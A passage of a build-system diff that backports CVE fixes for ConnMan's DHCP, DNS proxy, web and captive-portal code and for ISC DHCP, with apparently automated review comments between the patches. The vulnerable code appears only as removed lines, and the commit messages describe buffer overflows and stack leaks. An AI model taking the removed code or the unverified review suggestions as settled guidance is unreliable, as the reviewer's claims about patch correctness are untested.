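+ uint32_t server_nid =
+ get_unaligned((const uint32_t *) server_id_option);
+@@ -675,7 +677,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ return TRUE;
+ }
+
+- request_ip_option = dhcp_get_option(&packet, DHCP_REQUESTED_IP);
++ request_ip_option = dhcp_get_option(&packet, packet_len, DHCP_REQUESTED_IP);
+ if (request_ip_option)
+ requested_nip = get_be32(request_ip_option);
+
+--
+2.17.1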
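Review bot: In the first gdhcp/common.c hunk the loop guard of `dhcp_get_option()` becomes `(rem <= 0) && (optionptr + OPT_CODE > options_end)`, so the scan now stops only when both bounds are exhausted. Either condition alone means the next read is outside the option data, and the old `rem <= 0` exit no longer fires on its own; this looks like it should be `||`, though the code between the two hunks that handles the overload option is not visible and needs checking first. In the same hunk, `options_len = packet_len - (sizeof(*packet) - sizeof(packet->options))` wraps to a very large `size_t` when `packet_len` is smaller than the fixed header, which removes `options_end` as a bound. A guard before it, `if (packet_len < sizeof(*packet) - sizeof(packet->options)) return NULL;`, would close that.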
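--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch
@@ -0,0 +1,33 @@
+From a74524b3e3fad81b0fd1084ffdf9f2ea469cd9b1 Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:41:09 +0100
+Subject: [PATCH] gdhcp: Avoid leaking stack data via unitiialized variable
+
+Fixes: CVE-2021-26676
+
+Upstream-Status: Backport
+CVE: CVE-2021-26676
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=a74524b3e3fad81b0fd1084ffdf9f2ea469cd9b1
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ gdhcp/client.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 6a5613e7..c7b85e58 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -2270,7 +2270,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ {
+ GDHCPClient *dhcp_client = user_data;
+ struct sockaddr_in dst_addr = { 0 };
+- struct dhcp_packet packet;
++ struct dhcp_packet packet = { 0 };
+ struct dhcpv6_packet *packet6 = NULL;
+ uint8_t *message_type = NULL, *client_id = NULL, *option,
+ *server_id = NULL;
+--
+2.17.1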
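Review bot: The `= { 0 }` initializer on `packet` in listener_event is the whole fix, yet nothing on that line says why it must stay, so a later cleanup could drop it as redundant. A short comment would pin the intent, e.g. `/* keep zero-initialised: bytes not filled by the receive must not expose old stack contents (CVE-2021-26676) */`. The body of listener_event continues outside the hunk, so whether every receive path fills the struct completely cannot be confirmed from here.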
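--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch
@@ -0,0 +1,72 @@
+From eceb2e8d2341c041df55a5e2f047d9a8c491463c Mon Sep 17 00:00:00 2001
+From: Valery Kashcheev <v.kascheev@omp.ru>
+Date: Mon, 7 Jun 2021 18:58:24 +0200
+Subject: dnsproxy: Check the length of buffers before memcpy
+
+Fix using a stack-based buffer overflow attack by checking the length of
+the ptr and uptr buffers.
+
+Fix debug message output.
+
+Fixes: CVE-2021-33833
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=eceb2e8d2341c041df55a5e2f047d9a8c491463c
+CVE: CVE-2021-33833
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index de52df5a..38dbdd71 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1788,17 +1788,15 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * tmp buffer.
+ */
+
+- debug("pos %d ulen %d left %d name %s", pos, ulen,
+- (int)(uncomp_len - (uptr - uncompressed)), uptr);
+-
+- ulen = strlen(name);
+- if ((uptr + ulen + 1) > uncomp_end) {
++ ulen = strlen(name) + 1;
++ if ((uptr + ulen) > uncomp_end)
+ goto out;
+- }
+- strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
++ strncpy(uptr, name, ulen);
++
++ debug("pos %d ulen %d left %d name %s", pos, ulen,
++ (int)(uncomp_end - (uptr + ulen)), uptr);
+
+ uptr += ulen;
+- *uptr++ = '\0';
+
+ ptr += pos;
+
+@@ -1841,7 +1839,7 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ } else if (dns_type == ns_t_a || dns_type == ns_t_aaaa) {
+ dlen = uptr[-2] << 8 | uptr[-1];
+
+- if (ptr + dlen > end) {
++ if ((ptr + dlen) > end || (uptr + dlen) > uncomp_end) {
+ debug("data len %d too long", dlen);
+ goto out;
+ }
+@@ -1880,6 +1878,10 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * refresh interval, retry interval, expiration
+ * limit and minimum ttl). They are 20 bytes long.
+ */
++ if ((uptr + 20) > uncomp_end || (ptr + 20) > end) {
++ debug("soa record too long");
++ goto out;
++ }
+ memcpy(uptr, ptr, 20);
+ uptr += 20;
+ ptr += 20;
+--
+cgit 1.2.3-1.el7
+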
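Review bot: The new bounds checks in uncompress() add a length to a pointer before comparing, as in `(uptr + ulen) > uncomp_end` and `(uptr + dlen) > uncomp_end`, so an oversized length forms a pointer beyond the buffer before the test runs. Comparing the length with the space that remains avoids that: `if (ulen > uncomp_end - uptr) goto out;` and `if (dlen > end - ptr || dlen > uncomp_end - uptr) {`. `dlen` is built from `uptr[-2] << 8 | uptr[-1]`; the types of `dlen` and `uptr` are declared outside the hunks, so it is worth confirming the two bytes are read as unsigned and `dlen` cannot become negative. uncompress() starts and ends outside the hunks.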
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch
new file mode 100644
index 0000000000..7f27474830
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch
@@ -0,0 +1,121 @@
1From e5a313736e13c90d19085e953a26256a198e4950 Mon Sep 17 00:00:00 2001
2From: Daniel Wagner <wagi@monom.org>
3Date: Tue, 25 Jan 2022 10:00:24 +0100
4Subject: dnsproxy: Validate input data before using them
5
6dnsproxy is not validating various input data. Add a bunch of checks.
7
8Fixes: CVE-2022-23097
9Fixes: CVE-2022-23096
10
11Upstream-Status: Backport
12https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=e5a313736e13c90d19085e953a26256a198e4950
13
14CVE: CVE-2022-23096 CVE-2022-23097
15Signed-off-by: Steve Sakoman <steve@sakoman.com>
16
17---
18 src/dnsproxy.c | 31 ++++++++++++++++++++++++++-----
19 1 file changed, 26 insertions(+), 5 deletions(-)
20
21diff --git a/src/dnsproxy.c b/src/dnsproxy.c
22index cdfafbc2..c027bcb9 100644
23--- a/src/dnsproxy.c
24+++ b/src/dnsproxy.c
25@@ -1951,6 +1951,12 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
26
27 if (offset < 0)
28 return offset;
29+ if (reply_len < 0)
30+ return -EINVAL;
31+ if (reply_len < offset + 1)
32+ return -EINVAL;
33+ if ((size_t)reply_len < sizeof(struct domain_hdr))
34+ return -EINVAL;
35
36 hdr = (void *)(reply + offset);
37 dns_id = reply[offset] | reply[offset + 1] << 8;
38@@ -1986,23 +1992,31 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
39 */
40 if (req->append_domain && ntohs(hdr->qdcount) == 1) {
41 uint16_t domain_len = 0;
42- uint16_t header_len;
43+ uint16_t header_len, payload_len;
44 uint16_t dns_type, dns_class;
45 uint8_t host_len, dns_type_pos;
46 char uncompressed[NS_MAXDNAME], *uptr;
47 char *ptr, *eom = (char *)reply + reply_len;
48+ char *domain;
49
50 /*
51 * ptr points to the first char of the hostname.
52 * ->hostname.domain.net
53 */
54 header_len = offset + sizeof(struct domain_hdr);
55+ if (reply_len < header_len)
56+ return -EINVAL;
57+ payload_len = reply_len - header_len;
58+
59 ptr = (char *)reply + header_len;
60
61 host_len = *ptr;
62+ domain = ptr + 1 + host_len;
63+ if (domain > eom)
64+ return -EINVAL;
65+
66 if (host_len > 0)
67- domain_len = strnlen(ptr + 1 + host_len,
68- reply_len - header_len);
69+ domain_len = strnlen(domain, eom - domain);
70
71 /*
72 * If the query type is anything other than A or AAAA,
73@@ -2011,6 +2025,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
74 */
75 dns_type_pos = host_len + 1 + domain_len + 1;
76
77+ if (ptr + (dns_type_pos + 3) > eom)
78+ return -EINVAL;
79 dns_type = ptr[dns_type_pos] << 8 |
80 ptr[dns_type_pos + 1];
81 dns_class = ptr[dns_type_pos + 2] << 8 |
82@@ -2040,6 +2056,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
83 int new_len, fixed_len;
84 char *answers;
85
86+ if (len > payload_len)
87+ return -EINVAL;
88 /*
89 * First copy host (without domain name) into
90 * tmp buffer.
91@@ -2054,6 +2072,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
92 * Copy type and class fields of the question.
93 */
94 ptr += len + domain_len + 1;
95+ if (ptr + NS_QFIXEDSZ > eom)
96+ return -EINVAL;
97 memcpy(uptr, ptr, NS_QFIXEDSZ);
98
99 /*
100@@ -2063,6 +2083,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
101 uptr += NS_QFIXEDSZ;
102 answers = uptr;
103 fixed_len = answers - uncompressed;
104+ if (ptr + offset > eom)
105+ return -EINVAL;
106
107 /*
108 * We then uncompress the result to buffer
109@@ -2257,8 +2279,7 @@ static gboolean udp_server_event(GIOChannel *channel, GIOCondition condition,
110
111 len = recv(sk, buf, sizeof(buf), 0);
112
113- if (len >= 12)
114- forward_dns_reply(buf, len, IPPROTO_UDP, data);
115+ forward_dns_reply(buf, len, IPPROTO_UDP, data);
116
117 return TRUE;
118 }
119--
120cgit 1.2.3-1.el7
121
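Review bot: The early length checks in forward_dns_reply() do not cover the header that is read right after them: `hdr = (void *)(reply + offset)` needs `offset + sizeof(struct domain_hdr)` bytes, but the checks only require `offset + 1` bytes and, separately, `sizeof(struct domain_hdr)` bytes counted from the start of the buffer. With a non-zero `offset`, `reply[offset + 1]` and later `hdr->qdcount` are read before the `reply_len < header_len` test, which sits inside the `append_domain` branch. A single check `if ((size_t)reply_len < (size_t)offset + sizeof(struct domain_hdr)) return -EINVAL;` placed after the `reply_len < 0` test would cover both reads. The values `offset` can take are set outside the visible hunks.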
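--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch
@@ -0,0 +1,50 @@
+From d8708b85c1e8fe25af7803e8a20cf20e7201d8a4 Mon Sep 17 00:00:00 2001
+From: Matthias Gerstner <mgerstner@suse.de>
+Date: Tue, 25 Jan 2022 10:00:25 +0100
+Subject: dnsproxy: Avoid 100 % busy loop in TCP server case
+
+Once the TCP socket is connected and until the remote server is
+responding (if ever) ConnMan executes a 100 % CPU loop, since
+the connected socket will always be writable (G_IO_OUT).
+
+To fix this, modify the watch after the connection is established to
+remove the G_IO_OUT from the callback conditions.
+
+Fixes: CVE-2022-23098
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d8708b85c1e8fe25af7803e8a20cf20e7201d8a4
+
+CVE: CVE-2022-23098
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index c027bcb9..1ccf36a9 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -2360,6 +2360,18 @@ hangup:
+ }
+ }
+
++ /*
++ * Remove the G_IO_OUT flag from the watch, otherwise we end
++ * up in a busy loop, because the socket is constantly writable.
++ *
++ * There seems to be no better way in g_io to do that than
++ * re-adding the watch.
++ */
++ g_source_remove(server->watch);
++ server->watch = g_io_add_watch(server->channel,
++ G_IO_IN | G_IO_HUP | G_IO_NVAL | G_IO_ERR,
++ tcp_server_event, server);
++
+ server->connected = true;
+ server_list = g_slist_append(server_list, server);
+
+--
+cgit 1.2.3-1.el7
+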
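--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch
@@ -0,0 +1,37 @@
+From d1a5ede5d255bde8ef707f8441b997563b9312bd Mon Sep 17 00:00:00 2001
+From: Nathan Crandall <ncrandall@tesla.com>
+Date: Tue, 12 Jul 2022 08:56:34 +0200
+Subject: gweb: Fix OOB write in received_data()
+
+There is a mismatch of handling binary vs. C-string data with memchr
+and strlen, resulting in pos, count, and bytes_read to become out of
+sync and result in a heap overflow. Instead, do not treat the buffer
+as an ASCII C-string. We calculate the count based on the return value
+of memchr, instead of strlen.
+
+Fixes: CVE-2022-32292
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d1a5ede5d255bde8ef707f8441b997563b9312b
+CVE: CVE-2022-32292
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+---
+ gweb/gweb.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gweb/gweb.c b/gweb/gweb.c
+index 12fcb1d8..13c6c5f2 100644
+--- a/gweb/gweb.c
++++ b/gweb/gweb.c
+@@ -918,7 +918,7 @@ static gboolean received_data(GIOChannel *channel, GIOCondition cond,
+ }
+
+ *pos = '\0';
+- count = strlen((char *) ptr);
++ count = pos - ptr;
+ if (count > 0 && ptr[count - 1] == '\r') {
+ ptr[--count] = '\0';
+ bytes_read--;
+--
+cgit
+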
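Review bot: The upstream reference in this patch header is one character short: the URL ends in `...997563b9312b` while the `From` line gives `d1a5ede5d255bde8ef707f8441b997563b9312bd`. An abbreviated id usually still resolves, but tooling that matches backports to upstream commits by full hash will miss it; the line should read `https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d1a5ede5d255bde8ef707f8441b997563b9312bd`. In the code itself, `count = pos - ptr` is only meaningful because `pos` comes from the `memchr` described in the commit message; that call is outside the hunk.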
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch
new file mode 100644
index 0000000000..83a013981c
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch
@@ -0,0 +1,266 @@
1From 358a44b1442fae0f82846e10da0708b5c4e1ce27 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Tue, 20 Sep 2022 17:58:19 +0530
4Subject: [PATCH] CVE-2022-32293
5
6CVE: CVE-2022-32293
7Upstream-Status: Backport [https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=72343929836de80727a27d6744c869dff045757c && https://git.kernel.org/pub/scm/network/connman/connman.git/commit/src/wispr.c?id=416bfaff988882c553c672e5bfc2d4f648d29e8a]
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/wispr.c | 83 ++++++++++++++++++++++++++++++++++++++++-------------
11 1 file changed, 63 insertions(+), 20 deletions(-)
12
13diff --git a/src/wispr.c b/src/wispr.c
14index 473c0e0..97e0242 100644
15--- a/src/wispr.c
16+++ b/src/wispr.c
17@@ -59,6 +59,7 @@ struct wispr_route {
18 };
19
20 struct connman_wispr_portal_context {
21+ int refcount;
22 struct connman_service *service;
23 enum connman_ipconfig_type type;
24 struct connman_wispr_portal *wispr_portal;
25@@ -96,10 +97,13 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data);
26
27 static GHashTable *wispr_portal_list = NULL;
28
29+#define wispr_portal_context_ref(wp_context) \
30+ wispr_portal_context_ref_debug(wp_context, __FILE__, __LINE__, __func__)
31+#define wispr_portal_context_unref(wp_context) \
32+ wispr_portal_context_unref_debug(wp_context, __FILE__, __LINE__, __func__)
33+
34 static void connman_wispr_message_init(struct connman_wispr_message *msg)
35 {
36- DBG("");
37-
38 msg->has_error = false;
39 msg->current_element = NULL;
40
41@@ -159,11 +163,6 @@ static void free_wispr_routes(struct connman_wispr_portal_context *wp_context)
42 static void free_connman_wispr_portal_context(
43 struct connman_wispr_portal_context *wp_context)
44 {
45- DBG("context %p", wp_context);
46-
47- if (!wp_context)
48- return;
49-
50 if (wp_context->wispr_portal) {
51 if (wp_context->wispr_portal->ipv4_context == wp_context)
52 wp_context->wispr_portal->ipv4_context = NULL;
53@@ -200,9 +199,38 @@ static void free_connman_wispr_portal_context(
54 g_free(wp_context);
55 }
56
57+static struct connman_wispr_portal_context *
58+wispr_portal_context_ref_debug(struct connman_wispr_portal_context *wp_context,
59+ const char *file, int line, const char *caller)
60+{
61+ DBG("%p ref %d by %s:%d:%s()", wp_context,
62+ wp_context->refcount + 1, file, line, caller);
63+
64+ __sync_fetch_and_add(&wp_context->refcount, 1);
65+
66+ return wp_context;
67+}
68+
69+static void wispr_portal_context_unref_debug(
70+ struct connman_wispr_portal_context *wp_context,
71+ const char *file, int line, const char *caller)
72+{
73+ if (!wp_context)
74+ return;
75+
76+ DBG("%p ref %d by %s:%d:%s()", wp_context,
77+ wp_context->refcount - 1, file, line, caller);
78+
79+ if (__sync_fetch_and_sub(&wp_context->refcount, 1) != 1)
80+ return;
81+
82+ free_connman_wispr_portal_context(wp_context);
83+}
84+
85 static struct connman_wispr_portal_context *create_wispr_portal_context(void)
86 {
87- return g_try_new0(struct connman_wispr_portal_context, 1);
88+ return wispr_portal_context_ref(
89+ g_new0(struct connman_wispr_portal_context, 1));
90 }
91
92 static void free_connman_wispr_portal(gpointer data)
93@@ -214,8 +242,8 @@ static void free_connman_wispr_portal(gpointer data)
94 if (!wispr_portal)
95 return;
96
97- free_connman_wispr_portal_context(wispr_portal->ipv4_context);
98- free_connman_wispr_portal_context(wispr_portal->ipv6_context);
99+ wispr_portal_context_unref(wispr_portal->ipv4_context);
100+ wispr_portal_context_unref(wispr_portal->ipv6_context);
101
102 g_free(wispr_portal);
103 }
104@@ -450,8 +478,6 @@ static void portal_manage_status(GWebResult *result,
105 &str))
106 connman_info("Client-Timezone: %s", str);
107
108- free_connman_wispr_portal_context(wp_context);
109-
110 __connman_service_ipconfig_indicate_state(service,
111 CONNMAN_SERVICE_STATE_ONLINE, type);
112 }
113@@ -509,14 +535,17 @@ static void wispr_portal_request_portal(
114 {
115 DBG("");
116
117+ wispr_portal_context_ref(wp_context);
118 wp_context->request_id = g_web_request_get(wp_context->web,
119 wp_context->status_url,
120 wispr_portal_web_result,
121 wispr_route_request,
122 wp_context);
123
124- if (wp_context->request_id == 0)
125+ if (wp_context->request_id == 0) {
126 wispr_portal_error(wp_context);
127+ wispr_portal_context_unref(wp_context);
128+ }
129 }
130
131 static bool wispr_input(const guint8 **data, gsize *length,
132@@ -562,13 +591,15 @@ static void wispr_portal_browser_reply_cb(struct connman_service *service,
133 return;
134
135 if (!authentication_done) {
136- wispr_portal_error(wp_context);
137 free_wispr_routes(wp_context);
138+ wispr_portal_error(wp_context);
139+ wispr_portal_context_unref(wp_context);
140 return;
141 }
142
143 /* Restarting the test */
144 __connman_service_wispr_start(service, wp_context->type);
145+ wispr_portal_context_unref(wp_context);
146 }
147
148 static void wispr_portal_request_wispr_login(struct connman_service *service,
149@@ -592,7 +623,7 @@ static void wispr_portal_request_wispr_login(struct connman_service *service,
150 return;
151 }
152
153- free_connman_wispr_portal_context(wp_context);
154+ wispr_portal_context_unref(wp_context);
155 return;
156 }
157
158@@ -644,11 +675,13 @@ static bool wispr_manage_message(GWebResult *result,
159
160 wp_context->wispr_result = CONNMAN_WISPR_RESULT_LOGIN;
161
162+ wispr_portal_context_ref(wp_context);
163 if (__connman_agent_request_login_input(wp_context->service,
164 wispr_portal_request_wispr_login,
165- wp_context) != -EINPROGRESS)
166+ wp_context) != -EINPROGRESS) {
167 wispr_portal_error(wp_context);
168- else
169+ wispr_portal_context_unref(wp_context);
170+ } else
171 return true;
172
173 break;
174@@ -697,6 +730,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
175 if (length > 0) {
176 g_web_parser_feed_data(wp_context->wispr_parser,
177 chunk, length);
178+ wispr_portal_context_unref(wp_context);
179 return true;
180 }
181
182@@ -714,6 +748,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
183
184 switch (status) {
185 case 000:
186+ wispr_portal_context_ref(wp_context);
187 __connman_agent_request_browser(wp_context->service,
188 wispr_portal_browser_reply_cb,
189 wp_context->status_url, wp_context);
190@@ -725,11 +760,14 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
191 if (g_web_result_get_header(result, "X-ConnMan-Status",
192 &str)) {
193 portal_manage_status(result, wp_context);
194+ wispr_portal_context_unref(wp_context);
195 return false;
196- } else
197+ } else {
198+ wispr_portal_context_ref(wp_context);
199 __connman_agent_request_browser(wp_context->service,
200 wispr_portal_browser_reply_cb,
201 wp_context->redirect_url, wp_context);
202+ }
203
204 break;
205 case 302:
206@@ -737,6 +775,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
207 !g_web_result_get_header(result, "Location",
208 &redirect)) {
209
210+ wispr_portal_context_ref(wp_context);
211 __connman_agent_request_browser(wp_context->service,
212 wispr_portal_browser_reply_cb,
213 wp_context->status_url, wp_context);
214@@ -747,6 +786,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
215
216 wp_context->redirect_url = g_strdup(redirect);
217
218+ wispr_portal_context_ref(wp_context);
219 wp_context->request_id = g_web_request_get(wp_context->web,
220 redirect, wispr_portal_web_result,
221 wispr_route_request, wp_context);
222@@ -763,6 +803,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
223
224 break;
225 case 505:
226+ wispr_portal_context_ref(wp_context);
227 __connman_agent_request_browser(wp_context->service,
228 wispr_portal_browser_reply_cb,
229 wp_context->status_url, wp_context);
230@@ -775,6 +816,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
231 wp_context->request_id = 0;
232 done:
233 wp_context->wispr_msg.message_type = -1;
234+ wispr_portal_context_unref(wp_context);
235 return false;
236 }
237
238@@ -809,6 +851,7 @@ static void proxy_callback(const char *proxy, void *user_data)
239 xml_wispr_parser_callback, wp_context);
240
241 wispr_portal_request_portal(wp_context);
242+ wispr_portal_context_unref(wp_context);
243 }
244
245 static gboolean no_proxy_callback(gpointer user_data)
246@@ -903,7 +946,7 @@ static int wispr_portal_detect(struct connman_wispr_portal_context *wp_context)
247
248 if (wp_context->token == 0) {
249 err = -EINVAL;
250- free_connman_wispr_portal_context(wp_context);
251+ wispr_portal_context_unref(wp_context);
252 }
253 } else if (wp_context->timeout == 0) {
254 wp_context->timeout = g_idle_add(no_proxy_callback, wp_context);
255@@ -952,7 +995,7 @@ int __connman_wispr_start(struct connman_service *service,
256
257 /* If there is already an existing context, we wipe it */
258 if (wp_context)
259- free_connman_wispr_portal_context(wp_context);
260+ wispr_portal_context_unref(wp_context);
261
262 wp_context = create_wispr_portal_context();
263 if (!wp_context)
264--
2652.25.1
266
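Review bot: In wispr_portal_web_result() the `length > 0` branch now calls `wispr_portal_context_unref(wp_context)` and then returns `true`, while the matching `wispr_portal_context_ref()` is taken once before each `g_web_request_get()`. If gweb can invoke the result callback more than once for one request, every extra call drops a reference that was never taken and the context could be freed while still in use; how often gweb calls back is not visible in these hunks. Please confirm the one-call-per-request assumption and record it next to the unref, e.g. `/* consumes the reference taken before g_web_request_get() */`. Separately, `wispr_portal_context_unref_debug()` logs the word `ref`, which makes ref and unref lines indistinguishable in debug output.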
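--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch
@@ -0,0 +1,54 @@
+From 99e2c16ea1cced34a5dc450d76287a1c3e762138 Mon Sep 17 00:00:00 2001
+From: Daniel Wagner <wagi@monom.org>
+Date: Tue, 11 Apr 2023 08:12:56 +0200
+Subject: gdhcp: Verify and sanitize packet length first
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/network/connman/connman.git/patch/?id=99e2c16ea1cced34a5dc450d76287a1c3e762138]
+CVE: CVE-2023-28488
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ gdhcp/client.c | 16 +++++++++-------
+ 1 file changed, 9 insertions(+), 7 deletions(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 7efa7e45..82017692 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -1319,9 +1319,9 @@ static bool sanity_check(struct ip_udp_dhcp_packet *packet, int bytes)
+ static int dhcp_recv_l2_packet(struct dhcp_packet *dhcp_pkt, int fd,
+ struct sockaddr_in *dst_addr)
+ {
+- int bytes;
+ struct ip_udp_dhcp_packet packet;
+ uint16_t check;
++ int bytes, tot_len;
+
+ memset(&packet, 0, sizeof(packet));
+
+@@ -1329,15 +1329,17 @@ static int dhcp_recv_l2_packet(struct dhcp_packet *dhcp_pkt, int fd,
+ if (bytes < 0)
+ return -1;
+
+- if (bytes < (int) (sizeof(packet.ip) + sizeof(packet.udp)))
+- return -1;
+-
+- if (bytes < ntohs(packet.ip.tot_len))
++ tot_len = ntohs(packet.ip.tot_len);
++ if (bytes > tot_len) {
++ /* ignore any extra garbage bytes */
++ bytes = tot_len;
++ } else if (bytes < tot_len) {
+ /* packet is bigger than sizeof(packet), we did partial read */
+ return -1;
++ }
+
+- /* ignore any extra garbage bytes */
+- bytes = ntohs(packet.ip.tot_len);
++ if (bytes < (int) (sizeof(packet.ip) + sizeof(packet.udp)))
++ return -1;
+
+ if (!sanity_check(&packet, bytes))
+ return -1;
+--
+cgit
+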
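Review bot: `tot_len = ntohs(packet.ip.tot_len)` in dhcp_recv_l2_packet() is now read before the minimum-size check, so on a read shorter than the IP header it may come from bytes the receive did not fill. That is safe only because of the `memset(&packet, 0, sizeof(packet))` kept as context in the first hunk: an unfilled field reads as 0, `bytes` is clamped to it and the size check that follows rejects the packet. A comment at the read would keep that dependency visible, e.g. `/* packet was zeroed above; an unfilled tot_len reads as 0 and fails the size check below */`. The function continues outside the second hunk.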
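--- a/meta/recipes-connectivity/connman/connman_1.37.bb
+++ b/meta/recipes-connectivity/connman/connman_1.37.bb
@@ -6,6 +6,15 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/network/${BPN}/${BP}.tar.xz \
  file://0001-gweb-fix-segfault-with-musl-v1.1.21.patch \
  file://connman \
  file://no-version-scripts.patch \
+ file://CVE-2021-26675.patch \
+ file://CVE-2021-26676-0001.patch \
+ file://CVE-2021-26676-0002.patch \
+ file://CVE-2021-33833.patch \
+ file://CVE-2022-23096-7.patch \
+ file://CVE-2022-23098.patch \
+ file://CVE-2022-32292.patch \
+ file://CVE-2022-32293.patch \
+ file://CVE-2023-28488.patch \
 "
 
 SRC_URI_append_libc-musl = " file://0002-resolve-musl-does-not-implement-res_ninit.patch"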
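--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch
@@ -0,0 +1,66 @@
+From 5a7344b05081d84343a1627e47478f3990b17700 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 8 Jul 2021 00:08:25 +0000
+Subject: [PATCH] ISC has disclosed a vulnerability in ISC DHCP
+ (CVE-2021-25217)
+
+On May 26, 2021, we (Internet Systems Consortium) disclosed a
+vulnerability affecting our ISC DHCP software:
+
+ CVE-2021-25217: A buffer overrun in lease file parsing code can be
+ used to exploit a common vulnerability shared by dhcpd and dhclient
+ https://kb.isc.org/docs/cve-2021-25217
+
+New versions of ISC DHCP are available from https://www.isc.org/downloads
+
+Operators and package maintainers who prefer to apply patches selectively can
+find individual vulnerability-specific patches in the "patches" subdirectory
+of the release directories for our two stable release branches (4.4 and 4.1-ESV)
+
+ https://downloads.isc.org/isc/dhcp/4.4.2-P1/patches
+ https://downloads.isc.org/isc/dhcp/4.1-ESV-R16-P1/patches
+
+With the public announcement of this vulnerability, the embargo
+period is ended and any updated software packages that have been
+prepared may be released.
+
+Upstream-Status: Accepted [https://www.openwall.com/lists/oss-security/2021/05/26/6]
+CVE: CVE-2021-25217
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ common/parse.c | 7 ++++---
+ 1 file changed, 4 insertions(+), 3 deletions(-)
+
+diff --git a/common/parse.c b/common/parse.c
+index 386a632..fc7b39c 100644
+--- a/common/parse.c
++++ b/common/parse.c
+@@ -3,7 +3,7 @@
+ Common parser code for dhcpd and dhclient. */
+
+ /*
+- * Copyright (c) 2004-2019 by Internet Systems Consortium, Inc. ("ISC")
++ * Copyright (c) 2004-2021 by Internet Systems Consortium, Inc. ("ISC")
+ * Copyright (c) 1995-2003 by Internet Software Consortium
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+@@ -5556,13 +5556,14 @@ int parse_X (cfile, buf, max)
+ skip_to_semi (cfile);
+ return 0;
+ }
+- convert_num (cfile, &buf [len], val, 16, 8);
+- if (len++ > max) {
++ if (len >= max) {
+ parse_warn (cfile,
+ "hexadecimal constant too long.");
+ skip_to_semi (cfile);
+ return 0;
+ }
++ convert_num (cfile, &buf [len], val, 16, 8);
++ len++;
+ token = peek_token (&val, (unsigned *)0, cfile);
+ if (token == COLON)
+ token = next_token (&val,
+--
+2.17.1
+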
new file mode 100644
index 0000000000..11f162cbda
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch
@@ -0,0 +1,120 @@
1From 8a5d739eea10ee6e193f053b1662142d5657cbc6 Mon Sep 17 00:00:00 2001
